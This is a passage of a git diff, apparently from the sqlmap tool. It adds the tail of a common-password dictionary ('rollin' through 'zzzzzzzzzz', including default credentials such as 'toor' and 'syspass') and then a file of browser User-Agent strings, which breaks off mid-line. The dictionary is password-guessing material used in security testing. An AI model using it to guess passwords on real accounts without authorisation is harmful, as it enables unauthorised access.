+rollin +rollins +rolltide +romain +romance +romania +romanko +romantico +romeo +romero +ronald +ronaldinho +ronaldo +ronaldo9 +rong +roni +ronica +ronnie +roofer +rookie +rooney +roosevelt +rooster +roosters +root +root123 +rootadmin +rootbeer +rootme +rootpass +rootroot +rosalinda +rosario +roscoe +roseanne +rosebud +rosebush +rosemary +rosenborg +roserose +roses +rosie +rosita +ross +rossella +rotation +rotten +rotterdam +rouge +rough +route66 +router +rovers +roxana +roxanne +roxy +royal +royals +rr123456rr +rrrr +rrrrr +rrrrrr +rrrrrrrr +rrs +ruan +rubble +ruben +rudeboy +rudolf +rudy +rufus +rugby +rugby1 +rugger +rules +rumble +runar +runaway +runescape +runner +running +rupert +rush2112 +ruslan +russel +russell +russia +russian +rusty +rusty2 +ruth +ruthless +rw +rwa +RwfCxavL +ryan +ryousuke +s123456 +s4l4s4n4 
+saabas +saatana +saatana1 +sabine +sabotage +sabres +sabrina +sacramento +sacrifice +sadie +sadie1 +sagitario +sagittarius +sahabat +saibaba +saigon +sailfish +sailing +sailor +sailormoon +saint +saints +sairam +saiyan +sakalas +sakamoto +sakura +sakurasaku +sakusaku +sal +saladus +salainen +salama +salamandra +salasana +salasana123 +salasona +saleen +sales +salinger +sally +salmon +salomon +salope +salou25 +salut +salvador +salvation +samantha +samantha1 +sambo +samiam +samko +sammakko +sammie +sammy +sammy1 +sammy123 +samoht +sample +SAMPLE +Sample123 +sampson +samsam +samson +samsung +samsung1 +samsung123 +samuel +samuel22 +samuli +samurai +sanane +sanane123 +sananelan +sanchez +sand +sandeep +sander +sandhya +sandi +sandman +sandoval +sandra +sandrock +sandstorm +sandwich +sandy +sanfran +sanguine +sanjay +sanjose +sanpedro +santa +santana +santiago +santos +santosh +santtu +sanyika +saopaulo +SAP +sap123 +sapphire +sarah +sarah1 +sarasara +sarita +sascha +sasha +sasha123 +sasquatch +sassy +sassy1 +sasuke +satan666 +satelite +satellite +satisfaction +satori +satriani +saturday +saturn +saturn5 +saulite +saulute +saulyte +saunders +sausage +savage +savanna +savannah +sawyer +saxon +saxophone +sayang +sayangkamu +sayonara +scarface +scarlet +scarlett +schalke +schatzi +schedule +scheisse +scheme +schiller +schnapps +schneider +schnitzel +school +school1 +schooner +schroeder +schule +schumacher +schuster +schwartz +science +scirocco +scissors +scofield +scooby +scooby1 +scoobydo +scoobydoo +scooter +scooter1 +scooters +score +scorpio +scorpio1 +scorpion +scorpions +scotch +scotland +scott +scott1 +scottie +scottish +scotty +scout +scouting +scramble +scranton +scrapper +scrappy +scream +screamer +screen +screw +screwy +scribble +scrooge +scruffy +scuba1 +scully +seabee +seadoo +seagate +seagull +seahawks +seahorse +searay +search +searcher +searching +seashell +seashore +seattle +sebastian +sebastian1 +sebring +second +secret +secret1 +secret123 +secret3 +secret666 +secrets +secure +security +SECURITY +seduction +seinfeld +select +selector +selena +selina +seminoles +semper +semperfi +senators +seneca +seng +senha123 +senior +seniseviyorum +senna +senorita +sensation +sensei +sensitive +sensor +SENTINEL +seoul +septembe +september +septiembre +sequence +serdar +serega +serena +serenade +serendipity +serenity +sergei +sergey +sergio +series +serkan +servando +server +service +services +sessions +sestosant +settlers +setup +seven +seven7 +sevens +seventeen +sex +sex123 +sex4me +sexman +sexo +sexsex +sexual +sexx +sexxx +sexxxx +sexxy +sexy +sexy1 +sexy12 +sexy123 +sexy69 +sexybabe +sexybitch +sexyboy +sexygirl +sexylady +sexymama +sexyman +sexyme +sf49ers +sh +shadow +shadow1 +shadow12 +shaggy +shakespeare +shakira +shalimar +shalom +shampoo +shamrock +shan +shane +shania +shannon +shannon1 +shanti +shaolin +share +shark +sharma +sharon +sharpshooter +shasha +shaved +shearer +sheeba +sheena +sheep +sheffield +sheila +shekinah +shelby +sheldon +shelly +shelter +shemale +shen +sheng +sherbert +sheriff +sherlock +sherman +sherry +shevchenko +shi123456 +shibby +shilpa +shiner +shinichi +shinobi +ship +shipping +shirley +shirley1 +shit +shitface +shithead +shitshit +shitty +shivers +shock +shocker +shocking +shodan +shoelace +shopping +short +shortcake +shortcut +shorty +shorty1 +shoshana +shotgun +shotokan +shoulder +shovel +show +showboat +showcase +showme +showtime +shredder +shrimp +shuang +shun +shuriken +shutdown +shutup +shyshy +sideshow +sideways +sidney +siemens +sierra +Sierra +sifra 
+sifre +siga14 +sigma +sigmachi +signa +signal +sigrun +siilike +sikais +silence +silencio +silicone +silmaril +silver +silver1 +silverado +silverfish +silvia +simmons +simon +simona +simone +simonka +simonko +simple +simpleplan +simpson +simpsons +simran +sims +simulator +sinbad +sindre +sindri +sinegra +sinfonia +singapor +singer +single +sinister +sinned +sinner +sisma +sissy +sister +sister12 +sisters +sitakott +sitapea +site +sitecom +sixers +sixpack +sixpence +sixty +skate +skateboard +skateboarding +skater +skater1 +skeeter +skeleton +skibum +skidoo +skillet +skinhead +skinny +skipjack +skipper +skippy +skittles +skuggi +skydiver +skyhawk +skylar +skyline +skywalker +slacker +slammer +slapper +slappy +slapshot +slaptazodis +slater +slaughter +slave +slayer +sleeper +sleeping +sleepy +slick +slick1 +slider +slideshow +slimshady +slipknot +slipknot1 +slipknot666 +slniecko +sloppy +slovenia +slowpoke +sluggo +slut +sluts +slutty +sma +smackdown +small +smallville +smart1 +smartass +smartbox +smcadmin +smeghead +smegma +smelly +smile +smile1 +smiles +smiley +smith +smithers +smiths +smitty +smoke +smoke420 +smoker +smokey +smokey1 +smoking +smooch +smooth +smoothie +smother +smudge +smuggler +snakebite +snakeeater +snapper +snapple +snapshot +snatch +sneakers +sneaky +snickers +snickers1 +sniper +snoop +snoopdog +snoopdogg +snoopy +snoopy1 +snotra +snowball +snowbird +snowboar +snowfall +snowflak +snowflake +snowhite +snowman +snowman1 +snowshoe +snowski +snowwhite +snuffles +snuggles +soap +sober1 +sobriety +soccer +soccer1 +soccer10 +soccer11 +soccer12 +soccer13 +soccer2 +soccer22 +socrates +sofia +softball +softball1 +software +Sojdlg123aljg +sokrates +soldiers +soledad +soleil +solitaire +solitude +solla +solo +solomon +solstice +solutions +sombrero +some +somebody +someone +somethin +something +sometime +somewhere +sommar +sondra +song +songbird +sonics +sonrisa +sony +sony1 +sonya +sonyvaio +sooner +sophia +sophie +sorensen +soto +soul +soulmate +southpark +southside +southside1 +southwest +souvenir +sovereign +sowhat +soyhermosa +space +spaceman +spagetti +spaghetti +spain +spalding +spanker +spanking +spankme +spanky +spanner +sparhawk +sparkle +sparkles +sparky +Sparky +sparky1 +sparrows +sparta +spartan1 +spartan117 +spazz +speaker +speakers +special +special1 +specialist +specialk +spectral +spectre +spectrum +speeding +speedo +speedster +speedy +speles +spelling +spence +spencer +spencer1 +sperma +sphinx +sphynx +spice +spider +spider1 +spiderma +spiderman +spiderman1 +spidey +spike +spike1 +spikes +spikey +spirit +spiritual +spit +spitfire +splash +spock +spoiled +spongebo +spongebob +spongebob1 +spooge +spooky +spoon +sporting +sports +spotlight +spring +springs +sprinkle +sprite +spud +spunky +spurs +spyder +sql +sqlexec +square +squash +squeaker +squirrel +squirt +srinivas +sriram +sss +ssss +ssssss +sssssss +ssssssss +ssssssssss +stacey +staci +stacy +stainless +stairway +stalingrad +stalker +stamford +stampede +stan +standard +stanley +stanley1 +staples +star +star69 +starbuck +starbucks +starchild +starcraft +stardust +starfish +stargate +stargazer +starless +starlight +starling +starr +stars +starshine +starship +start +start1 +starter +startfinding +starting +startrek +starwars +starwars1 +state +Status +stayout +stealth +steaua +steele +steelers +steelers1 +steelman +stefan +stefania +stefanie +stefanos +stelios +stella +stellar +steph +steph1 +stephani +stephanie +stephanie1 +stephen +stephens +stephi +stereo +sterling +sternchen +steve +steven +steven1 +stevens 
+stewart +stick +stickman +sticky +stiletto +stimpy +sting1 +stingray +stinker +stinky +stitches +stock +stockman +stockton +stoffer +stolen +stone +stonecold +stonehenge +stoneman +stoner +stones +stories +storm +straight +strange +stranger +strat +strategy +stratus +strawber +strawberry +stream +streamer +streaming +street +streets +strider +strike +strikers +string +stripper +stroker +stronger +stronghold +struggle +strummer +struzhka +stryker +stuart +stubby +student +student1 +student2 +students +studioworks +studman +stunner +stuntman +stupid +stupid1 +sturgeon +style +styles +sublime +submarine +submit +subwoofer +subzero +success +successful +succubus +sucesso +sucked +sucker +suckers +sucking +suckit +suckme +suckmydick +sucks +sudoku +sue +sugarplum +suicidal +suicide +suitcase +sukses +sullivan +summer +summer00 +summer01 +summer05 +summer1 +summer12 +summers +summit +summoner +sunbird +sundance +sunday +sundevil +sunfire +sunflowe +sunflower +sunflowers +sunita +suniukas +sunna +sunny123 +sunnyboy +sunnyday +sunrise +sunset +sunshine +sunshine1 +suomi +super +super123 +superbowl +superboy +supercool +superdog +superduper +supergirl +superhero +superior +superman +superman1 +supermand +supermen +supernova +superpass +superpower +supersecret +supersonic +superstage +superstar +superuser +supervisor +support +supra +surabaya +surecom +surf +surfboard +surfer +surfing +surprise +surrender +surround +survival +survivor +susana +sushi +susie +suslik +suzanne +suzuki +suzy +sveinn +sverige +svetlana +swanson +sweden +sweet +sweet1 +sweet123 +sweet16 +sweetest +sweetheart +sweetie +sweetiepie +sweetnes +sweetness +sweetpea +sweets +sweetwater +sweety +swim +swimming +swingers +swinging +switzer +swoosh +sword +swordfis +swordfish +sydney +sylvania +sylvester +sylvia +sylwia +symbol +symmetry +sympa +symphony +syndrome +synergy +syracuse +sys +sysadm +syspass +system +system5 +syzygy +szabolcs +szerelem +szeretlek +sziszi +tabatha +taco +tacobell +tacoma +tactical +taffy +tagged +tajmahal +takahiro +takanori +takataka +takayuki +takedown +takoyaki +talented +talks +tallinn +tallulah +talon +tamara +tami +tamtam +tania +tanker +tanner +tantra +tanya1 +tanzania +tapestry +tappancs +tappara +tara +tarantino +taratara +tardis +targas +target +target123 +tarheel +tarpon +tarragon +tartar +tarzan +tasha1 +tassen +tatiana +tattoo +taurus +taxman +taylor +taylor1 +taytay +tazdevil +tazman +tazmania +tbird +t-bone +teacher +teacher1 +teaching +team +teamo +teamomucho +teamwork +teardrop +tech +technical +technics +techno +techsupport +tectec +teddy +teddybea +teddybear +teenage +teenager +teens +teflon +teiubesc +tekiero +tekila +tekken +Telechargement +telecom +telefon +telefonas +telefono +telefoon +telemark +telephone +televizija +telos +telus00 +temp +temp! +temp123 +tempest +templar +template +temporal +temporary +temppass +temptation +temptemp +tender +tenerife +teng +tennesse +tennessee +tennis +tennyson +tequiero +tequieromucho +tequila +tere123 +teresa +teretere +terminal +terminat +terminator +terminus +terrapin +terrell +terriers +terrific +terror +terrorist +terserah +test +test! 
+test1 +test12 +test123 +test1234 +test2 +test3 +testament +teste123 +tester +testi +testicle +testing +testpass +testpilot +testtest +test_user +tetsuo +texas +thaddeus +thai123 +thailand +thankyou +the +thebeach +thebear +thebeast +thebest +thebest1 +thecat +thecrow +thecure +thedon +thedoors +thedude +theforce +thegame +their +thejudge +thekid +theking +thelma +theman +thematrix +themis +theodora +theodore +there +theresa +therock +these +thesims +thethe +thething +thetruth +thiago +thing +thinking +thinkpad +thirteen +this +thisisit +thomas +thomas01 +thomas1 +thomas123 +thompson +thong +thongs +thornton +thousand +threesome +thriller +throat +thuglife +thumbs +thumper +thunder +thunder1 +thunderbolt +thunders +thursday +thurston +thx1138 +tian +tibco +tiburon +ticket +tickle +ticktock +tierno +tietokone +tiffany +tiffany1 +tiger +tiger1 +tiger123 +tigereye +tigerman +tigers +tigerwoods +tigger +tigger1 +tigger12 +tight +tightend +tights +tigre +tigris +tiiger +tika +tikitiki +timberlake +time +timelord +timely +timeout +timosha +timosha123 +timothy +timtim +tinker +tinkerbe +tinkerbell +tinkle +tinman +tintin +Tiny +tiramisu +tissemand +titanic +titanium +titimaman +titkos +titouf59 +tits +titten +titty +tivoli +tmnet123 +tnt +tobias +toby +today +toejam +together +toggle +toilet +tokiohotel +tokyo +tomas123 +tomasko +tomato +tombstone +tomcat +tomek1 +tomika +tomislav1 +tommaso +tommy +tommy123 +tomohiro +tomotomo +tomtom +tomukas +tong +tonight +tony +tonytony +toolbox +toomas +toon +toor +toothpaste +toothpick +tootsie +topcat +topdog +topgun +tophat +topnotch +topolino +topsecret +torcida +toreador +toriamos +torino +tormentor +tornado +tornado1 +toronto +toronto1 +torpedo +torrance +torrents +torres +tortilla +tortoise +toshiba +total +toti +toto1 +tototo +tottenham +toucan +touchdown +touching +tower +town +townsend +toxic +toxicity +toyota +trace +tracer +traci +track +tracker +tractor +tracy +trader +traffic +trails +train +trainer +trampoline +trance +tranquil +transfer +transform +transformer +transformers +transit +trash +trashcan +trashman +trauma +travel +traveler +traveller +travis +tre +treble +tree +treefrog +trees +treetop +treetree +trespass +trevor +trial +triathlon +tribunal +tricia +trickster +trigger +trinidad +trinitro +trinity +trip +triple +tripleh +triplets +tripod +tripper +tripping +trish +trisha +tristan +tristan1 +triton +triumph +trivial +trixie +trojan +trojans +troll +trombone +trooper +troopers +trophy +trouble +trout +troy +truck +truelove +truffles +trujillo +trumpet +trunks +trunte +trustme +trustno1 +trustnoone +truth +tryagain +tsunami +tttttt +tuan +tucker +tucson +tudelft +tuesday +tula +tuna +tunafish +tundra +tunnussana +tuomas +tupac +tuppence +turbine +turbo +turbo2 +turkey +turner +turnip +turquoise +turtle +tutor +tuttle +tweety +tweety1 +tweetybird +twelve +twenty +twilight +twinkie +twinkle +twinkles +twins +twisted +twister +twitter +tybnoq +tycoon +tyler +tyler1 +typewriter +typhoon +tyrone +tyson +tyson1 +U38fa39 +uboot +ultima +ultimate +ultra +ultrasound +umbrella +umesh +umpire +unbreakable +undead +underdog +understand +undertaker +undertow +underwater +underworld +unforgiven +unhappy +unicorn +unicornio +unicorns +unique +united +unity +universal +universe +universidad +university +unix +unknown +unleashed +unlocked +unreal +untitled +untouchable +uploader +upsilon +uptown +upyours +uQA9Ebw445 +urchin +ursula +usa123 +user +user0 +user1 +user1234 +user2 +user3 +user4 +user5 +user6 +user7 +user8 +user888 +username +usmarine +usmc 
+Usuckballz1 +utility +utopia +uuuuuuuu +vacation +vaffanculo +vagabond +vagina +val +valami +valdemar +valencia +valentin +valentina +valentinchoque +valentine +valeria +valerian +valerie +valeverga +valhalla +validate +valtteri +vampire +vampire1 +vampires +vanderbilt +vanesa +vanessa +vanessa1 +vanhalen +vanilla +vanquish +variable +vasant +vasara +vaseline +vector +vedder +vedran +vegas +vegeta +vegetable +velo +velocity +vengeance +venkat +venom +ventura +venus +vera55 +veracruz +verbatim +vergessen +veritas +verizon +vermilion +verona +veronica +veronika +veronique +vertical +verygood +vette +vfhbyf +vfrcbv +vh5150 +viagra +vickie +victor +victoria +victoria1 +victory +video +vietnam +viewsoni +vijaya +viking +vikings +vikings1 +viktor +viktoria +viktorija +vincent +vineyard +vinicius +vinkovci +vinnie +violator +violence +violet +violetta +violette +violin +viper +vipergts +vipers +virgilio +virgin +virginia +virtual +virus +VIRUSER +visa +viscount +vishal +vision +vision2 +visitor +visitors +visor +visual +vittoria +vittorio +vivian +viviana +vivien +vivienne +vkontakte +vladimir +VOizGwrC +volcano +volcom +volimte +volkswag +volley +volleyba +volleyball +voltaire +volume +volunteer +volvo +voodoo +voyager +voyeur +VQsaBLPzLa +vsegda +vulcan +vvvv +vvvvvvvv +waffle +waiting +wakefield +walden +walker +wallace +wall.e +walrus +walter +wanderlust +wang +wangyut2 +wanker +wanted +warcraft +wareagle +warehouse +warez +wargames +warhamme +warhammer +warlock +warning +warranty +warren +warrior +warrior1 +warriors +warszawa +wasabi +washington +wasser +wassup +wasted +watanabe +watch +watchdog +watching +watchman +watchmen +water +water123 +waterfall +waterman +watermelon +waterpolo +waters +watson +wayne +weasel +weather +weaver +web +webcal01 +weblogic +webmaste +webmaster +webster +wedding +wedge +wednesday +weed420 +weenie +weezer +welcome +welcome1 +welcome123 +welder +wellington +wendi +wendy +wendy1 +weng +werder +werdna +werewolf +wert +wertwert +wertz123 +wesley +westcoast +western +westgate +westlife +weston +westside +westwind +wetpussy +wg +wh +whale1 +what +whatever +whatever1 +whatnot +whatsup +whatthe +whatwhat +whiplash +whiskey +whisky +whisper +whit +white +whiteboy +whiteman +whiteout +whiting +whitney +whittier +whocares +whoknows +wholesale +whynot +wichmann +wicked +wickedwitch +widzew +wiesenhof +wifey +wiktoria +wild +wildbill +wildcat +wildcats +wildfire +wildflower +wildlife +wildman +wildone +wildrose +will +william +william1 +williams +willie +willis +willow +Willow +wilson +wind +window +windows +windows1 +windowsxp +windsurf +windward +winger +wingnut +wings +winner +winner1 +winnie +Winnie +winnipeg +winona +winston +winter +winthrop +wisconsin +wisdom +wiseguy +wishbone +witchcraft +wizard +wizard1 +wizards +woaini +woaini1314 +wojtek +wolf +wolf1 +wolfen +wolfgang +wolfhound +wolfie +wolfpac +wolfpack +wolverin +wolverine +wolverines +wolves +woman +wombat +women +wonder +wonderful +wood +woodbury +woodchuck +woodie +woodland +woodlawn +woodruff +woodside +woodstoc +woodwind +woody +woofer +woowoo +word +wordpass +wordup +work +work123 +working +workout +world +wormhole +worship +worthy +wow12345 +wowwow +wraith +wrangler +wrench +wrestle +wrestler +wrestlin +wrestling +wrinkle1 +writer +writing +wsh +www +wwww +wwwwww +wwwwwww +wwwwwwww +xanadu +xanth +xavier +xbox360 +xceladmin +xcountry +x-files +xiang +xiao +ximena +ximenita +xing +xiong +XRGfmSx +xtr +xuan +xxx +xxx123 +xxxx +xxxxx +xxxxxx +xxxxxxx +xxxxxxxx +xxxxxxxxxx +xyz +xyzzy +y +YAgjecc826 
+yahoo +yahoo123 +yamaha +yamahar1 +yamamoto +yang +yankee +yankees +yankees1 +yankees2 +yardbird +yasmin +yasuhiro +yaya +yeah +yellow +yellow1 +yellow12 +yes +yeshua +yessir +yesterday +yesyes +yfnfif +ying +yingyang +yolanda +yomama +yong +yorktown +yosemite +yoteamo +youbye123 +young +young1 +yourmom +yourmom1 +yourname +yourself +yoyo +yoyoma +yoyoyo +ysrmma +YtQ9bkR +ytrewq +yuan +yuantuo2012 +yukiyuki +yukon +yummy +yvonne +yxcvbnm +yyyy +yyyyyyyy +yzerman +z123456 +z1x2c3v4 +za123456 +zacefron +zachary +zachary1 +zadzad +zag12wsx +zagreb +zalgiris +zander +zang +zanzibar +zapato +zaphod +zaq12wsx +zaq1zaq1 +zaqxsw +zaragoza +zebra +zebras +zeng +zenith +zeppelin +zepplin +zerocool +zerozero +zeus +zhang +zhao +zheng +zhong +zhongguo +zhou +zhuang +zhuo +zidane +ziggy +zildjian +zimbabwe +zing +ziomek +zipper +zippo +zirtaeb +zk.: +zmodem +zolika +zoltan +zombie +zong +zoomer +zoosk +zuikis +zuzana +ZVjmHgC355 +zwerg +zxc +zxc123 +zxcasdqwe +zxccxz +zxcv +zxcv1234 +zxcvb +zxcvbn +zxcvbnm +Zxcvbnm +zxcvbnm1 +zxcvbnm123 +zxcxz +zxczxc +zxzxzx +zzzxxx +zzzzz +zzzzzz +zzzzzzzz +zzzzzzzzzz diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt new file mode 100644 index 00000000000..31bca9529d3 --- /dev/null +++ b/data/txt/user-agents.txt @@ -0,0 +1,190 @@ +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.33 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.155 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/139 Version/11.1.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/139 Version/16.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) 
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/18.6 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.13 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.14 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac 